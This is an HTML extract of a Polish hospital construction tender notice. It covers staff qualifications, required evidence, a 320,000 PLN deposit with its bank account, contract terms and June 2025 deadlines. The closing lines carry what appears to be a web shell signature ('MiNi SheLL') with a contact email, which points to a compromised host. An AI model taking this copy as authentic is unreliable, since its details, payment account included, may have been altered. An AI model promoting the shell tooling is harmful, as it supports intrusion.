Klasyfikacji Obiektów Budowlanych należące do klasy 1264) o wartości robótbudowlanych min.15.000.000 PLN brutto, nieprzerwanie przez okres minimum 8 miesięcy, włącznie z dokonaniem wpisu do dziennika budowy o zakończeniu robót<br/>-min.1 osobą wyznaczoną do pełnienia funkcji Kierownika robót sanitarnych, która posiada uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane nabyte co najmniej 10 lat przed upływem terminu składania ofert, która jest członkiem właściwej izby samorządu zawodowego oraz w okresie ostatnich 10 lat przed upływem terminu składania ofert pełniła funkcję kierownika robót na co najmniej 1 robocie obejmującej budowę lub rozbudowę lub przebudowę budynku lub budynków szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych należące do klasy 1264) o wartości robót budowlanych min.15.000.000 PLN brutto, nieprzerwanie przez okres minimum 8 miesięcy, włącznie z dokonaniem wpisu do dziennika budowy o zakończeniu robót,<br/>-min.1 osobą wyznaczoną do pełnienia funkcji specjalisty ds. wyposażenia technologii medycznej, która w okresie ostatnich 10 lat przed upływem terminu składania ofert nadzorowała montaż i uruchomienie wyposażenia oraz sprzętu medycznego co najmniej sal operacyjnych, oddziału AiIT, wartość wyposażenia i sprzętu medycznego nie mniejsza niż 5.000.000 zł brutto na co najmniej 1 inwestycji obejmującej budowę lub przebudowę budynku szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych należące do klasy 1264), nieprzerwanie przez okres minimum 6 miesięcy;<br/>- min.1 osobą do pełnienia funkcji Projektanta Głównego (Koordynatora Zespołu Projektantów) posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń, posiadającą min. 10-letnie doświadczenie zawodowe w projektowaniu w specjalności architektonicznej oraz posiadającą aktualny wpis do Izby Architektów RP, <br/>- doświadczenie w sporządzeniu jako projektant ww. specjalności, co najmniej 2 usług polegających na wykonaniu kompletnych dokumentacji projektowych projektu budowlanego i wykonawczego lub architektoniczno-budowlanego, technicznego i wykonawczego), obiektów szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych należące do klasy 1264). Każda z usług obejmowała co najmniej- blok operacyjny z min. 3 salami operacyjnymi,<br/>- min.1 osobą wyznaczoną do pełnienia funkcji Projektant instalacji branży elektrycznej posiadający uprawnienia do projektowania w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń i która udokumentuje co najmniej 5 - letnie doświadczenie zawodowe w zakresie sporządzania dokumentacji projektowych (liczone po uzyskaniu wpisu na właściwą listę zawodową Okręgowej Izby Inżynierów Budownictwa)- doświadczenie w sporządzeniu jako projektant ww. specjalności, co najmniej 2 usług polegających na wykonaniu kompletnych dokumentacji projektowych tj.: (a) projektu budowlanego i wykonawczego lub (b) architektoniczno-budowlanego, technicznego i wykonawczego, dla obiektów szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych należące do klasy 1264). Każda z usług obejmowała co najmniej- blok operacyjny z min.3 salami operacyjnymi,<br/>k) min.jedną osobą wyznaczoną do pełnienia funkcji Projektant instalacji branży sanitarnej, spełniający wszystkie poniżej wskazane wymagania- posiadający uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń i która udokumentuje co najmniej 5 - letnie doświadczenie zawodowe w zakresie sporządzania dokumentacji projektowych (liczone po uzyskaniu wpisu na właściwą listę zawodową Okręgowej Izby Inżynierów Budownictwa)<br/>- doświadczenie w sporządzeniu jako projektant ww. specjalności, co najmniej 2 usług polegających na wykonaniu kompletnych dokumentacji projektowych tj.(a) projektu budowlanego i wykonawczego lub (b) architektoniczno-budowlanego, technicznego i wykonawczego, dla obiektów szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych należące do klasy 1264). Każda z usług obejmowała co najmniej blok operacyjny z co najmniej 3 salami operacyjnymi<br/>-min.jedną osobą wyznaczoną do pełnienia funkcji Projektanta Technologa Medycznego posiadającą wykształcenie wyższe, doświadczenie jako technolog medyczny, w wykonaniu co najmniej 2 usług polegających na wykonaniu kompletu dokumentacji projektowej z branży technologii medycznej tj.: (a) projektu budowlanego i wykonawczego lub (b) architektoniczno-budowlanego, technicznego i wykonawczego) dla budowy lub przebudowy obiektów szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych 1264). Każda z usług obejmowała co najmniej blok operacyjny z co najmniej 3 salami operacyjnymi,<br/>min. jedną osobą wyznaczoną do pełnienia funkcji Projektant -konstruktor, <br/>- posiadający uprawnienia do projektowania w specjalności konstrukcyjnej bez ograniczeń i która udokumentuje co najmniej 5 letnie doświadczenie zawodowe w zakresie sporządzania dokumentacji projektowych (liczone po uzyskaniu wpisu na właściwą listę zawodową Okręgowej Izby Inżynierów Budownictwa) doświadczenie w sporządzeniu jako projektant ww. specjalności, min. 2 usług polegających na wykonaniu kompletnych dokumentacji projektowych projektu budowlanego i wykonawczego lubarchitektoniczno-budowlanego, technicznego i wykonawczego, dla obiektów szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych klasy 1264). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">-oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz.U z 2021, poz. 275 z późn. zm., t.j. z dnia 2021.02.11), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Załącznik nr 5 do SWZ;<br/>-odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>Zamawiający wymaga załączenia do oferty oświadczenia Wykonawcy o niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie:<br/>- art.7 ust. 1 ustawy z dnia 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego- zgodnie z Załącznikiem nr 4 do SWZ;<br/> - art. 5k Rozporządzenia Rady (UE) 2022/576 z dnia 8 kwietnia 2022r. w sprawie zmiany Rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie - zgodnie z Załącznikiem nr 4 do SWZ.<br/><br/>W celu potwierdzenia wstępnego spełniania warunków udziału w postępowaniu oraz w celu wykazania braku podstaw do wykluczenia oraz spełniania warunków udziału w postępowaniu – Załącznik nr 6 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 10 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej posiadanie środków finansowych lub zdolność kredytową Wykonawcy w wysokości 20 000 000,00 zł brutto (słownie: dwadzieścia milionów złotych 00/100), w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/> Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż: 20 000 000,00 zł.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony wyżej:<br/>- może spełnić w całości co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>- może wykazać dowolny Wykonawca spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>- mogą wykazać się wszyscy Wykonawcy (łącznie) spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>4)	kopia opłaconej polisy ubezpieczeniowej OC w prowadzonej działalności związanej z przedmiotem zamówienia, tj. w zakresie wykonywania robót budowlanych, w wysokości co najmniej 30.000.000,00 PLN (słownie: trzydzieści milionów złotych) lub równowartości tej kwoty. Dopuszczalna franczyza dla szkód rzeczowych i osobowych wynosi 10.000,00 PLN (słownie: dziesięć tysięcy złotych) wraz z potwierdzeniem opłacenia składki polisy.<br/><br/> Wykonawca, w przypadku okazania polisy z udziałem własnym (franszyzą), jest zobowiązany pokryć z własnych środków potrąconą przez ubezpieczyciela tytułem udziału własnego (franszyzy) kwotę. Jeżeli suma ubezpieczenia wyrażona jest w innej walucie, dla potrzeb sprawdzenia spełniania warunku, podana wartość zostanie przeliczona według kursu średniego NBP obowiązującego na dzień ogłoszenia zamówienia,<br/>4) wykazu robót - Zamawiający będzie dokonywał oceny spełnienia tego warunku na podstawie wykazu robót budowlanych przedstawionych przez Wykonawcę (w ilości <br/>i zakresie niezbędnym dla potwierdzenia spełnienia warunku) , zgodnie z Załącznikiem nr 9 do SWZ – Wykaz robót budowlanych /wzór/,<br/>5) wykazu dostaw - Zamawiający będzie dokonywał oceny spełnienia tego warunku na podstawie wykazu robót budowlanych przedstawionych przez Wykonawcę (w ilości i zakresie niezbędnym dla potwierdzenia spełnienia warunku), zgodnie z Załącznikiem nr 8 do SWZ – Wykaz dostaw /wzór/,<br/>6) wykazu dokumentacji projektowych - Zamawiający będzie dokonywał oceny spełnienia tego warunku na podstawie wykazu robót budowlanych przedstawionych przez Wykonawcę (w ilości i zakresie niezbędnym dla potwierdzenia spełnienia warunku), zgodnie z Załącznikiem nr 10 do SWZ – Wykaz wykonanych dokumentacji projektowych /wzór/,<br/>6) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości <br/>lub kierowanie pracami wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami - zgodnie z Załącznikiem nr 11 do SWZ – Wykaz osób /wzór/.<br/><br/>	Do wykazu należy dołączyć również dokumenty potwierdzające posiadane uprawnienia oraz kwalifikacje zawodowe, a także dokument potwierdzający opłacenie składki członkowskiej w Izbie Inżynierów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykaz oświadczeń i dokumentów, jakie wykonawca zobowiązany jest złożyć wraz z ofertą potwierdzających, że oferowane roboty budowlane, w tym dostawy sprzętu, spełniają określone przez Zamawiającego wymagania (przedmiotowe środki dowodowe):<br/>a) materiały informacyjne: opis sprzętu medycznego foldery, fotografie, katalog, informacje dla użytkownika – dokumentujące i potwierdzające wymagane parametry z zaznaczeniem każdego parametru wskazanego przez Wykonawcę w języku polskim,<br/>b) certyfikat CE jednego producenta na istotne elementy sprzętu,<br/>c) deklaracje zgodności producenta oferowanego wyrobu medycznego,<br/>d) dokument potwierdzający zgłoszenie/powiadomienie/wniosek i/lub wpis oferowanych wyrobów medycznych do rejestru wyrobów medycznych prowadzonych przez Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i do używania – jeżeli dotyczy;<br/>e) oświadczenie potwierdzające zgodność realizacji przedmiotu umowy z zasadą DNSH.<br/><br/>Zamawiający wezwie Wykonawcę, który nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie, chyba, że przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania,<br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykaz oświadczeń i dokumentów, jakie wykonawca zobowiązany jest złożyć wraz z ofertą potwierdzających, że oferowane roboty budowlane, w tym dostawy sprzętu, spełniają określone przez Zamawiającego wymagania (przedmiotowe środki dowodowe):<br/>a) materiały informacyjne: opis sprzętu medycznego foldery, fotografie, katalog, informacje dla użytkownika – dokumentujące i potwierdzające wymagane parametry z zaznaczeniem każdego parametru wskazanego przez Wykonawcę w języku polskim,<br/>b) certyfikat CE jednego producenta na istotne elementy sprzętu,<br/>c) deklaracje zgodności producenta oferowanego wyrobu medycznego,<br/>d) dokument potwierdzający zgłoszenie/powiadomienie/wniosek i/lub wpis oferowanych wyrobów medycznych do rejestru wyrobów medycznych prowadzonych przez Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i do używania – jeżeli dotyczy;<br/>e) oświadczenie potwierdzające zgodność realizacji przedmiotu umowy z zasadą DNSH.<br/><br/>Zamawiający wezwie Wykonawcę, który nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie, chyba, że przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania,<br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Oferta musi być zabezpieczona wadium w wysokości: <br/>320 000,00 PLN [słownie: trzysta dwadzieścia tysięcy złotych 00/100]; <br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie <br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp.<br/>Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>1) pieniądzu; <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:<br/>w Banku Gospodarstwa Krajowego I Oddział w Warszawie, <br/>nr konta: 96 1130 1017 0020 0760 6720 0002;<br/>Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez Zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium (jeżeli wpływ środków pieniężnych na rachunek bankowy wskazany przez Zamawiającego nastąpi przed upływem terminu składania ofert).<br/> Wadium wnoszone w postaci niepieniężnej należy złożyć najpóźniej w terminie wyznaczonym do składania ofert w wydzielonym, odrębnym pliku. Wadium wnoszone w formie gwarancji lub poręczenia należy przekazać jako oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>Z treści przelewu bankowego w przypadku wadium wniesionego w pieniądzu oraz <br/>z treści gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną w postępowaniu o udzielenie zamówienia publicznego – „……..(podać nazwę postępowania)” Oznaczenie sprawy: (podać znak postępowania)…………………….<br/>Za zgodą Zamawiającego wykonawca może dokonać zmiany formy wadium na jedną lub kilka form, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp. Zmiana formy wadium musi być dokonana z zachowa¬niem ciągłości zabezpieczenia oferty kwotą wadium.<br/>Zwrot wadium:<br/>1) Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie <br/>7 dni od dnia wystąpienia jednej z okoliczności: <br/>a) upływu terminu związania ofertą; <br/>b) zawarcia umowy w sprawie zamówienia publicznego; <br/>c) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>2) Zamawiający niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku, zwraca wadium Wykonawcy: <br/>a) który wycofał ofertę przed upływem terminu składania ofert; <br/>b) którego oferta została odrzucona; <br/>c) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza; <br/>d) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>Złożenie wniosku o zwrot wadium, o którym mowa w ust. 10 pkt. 2 SWZ, powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp.<br/>Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br/>Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> dla spełnianie warunku posiadania informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej posiadanie środków finansowych lub zdolność kredytową Wykonawcy w wysokości 20 000 000,00 zł brutto (słownie: dwadzieścia milionów złotych 00/100), w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/> Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż: 20 000 000,00 zł.<br/>Szczegółowo opisane informacje dla Wykonawców wspólnie ubiegających sie o udzielenie zamówienia zostały opisane zawarte zostały w Rozdziale IX, XI, XIII, XV, XVIII SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian zawiera się w Załączniku nr 7 do SWZ - projekt umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-04 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pomocą platformy zakupowej https://szpitalpraski.ezamawiajacy.pl/pn/szpitalpraski/demand/notice/public/current/list?USER_MENU_HOVER=currentNoticeList.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-04 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com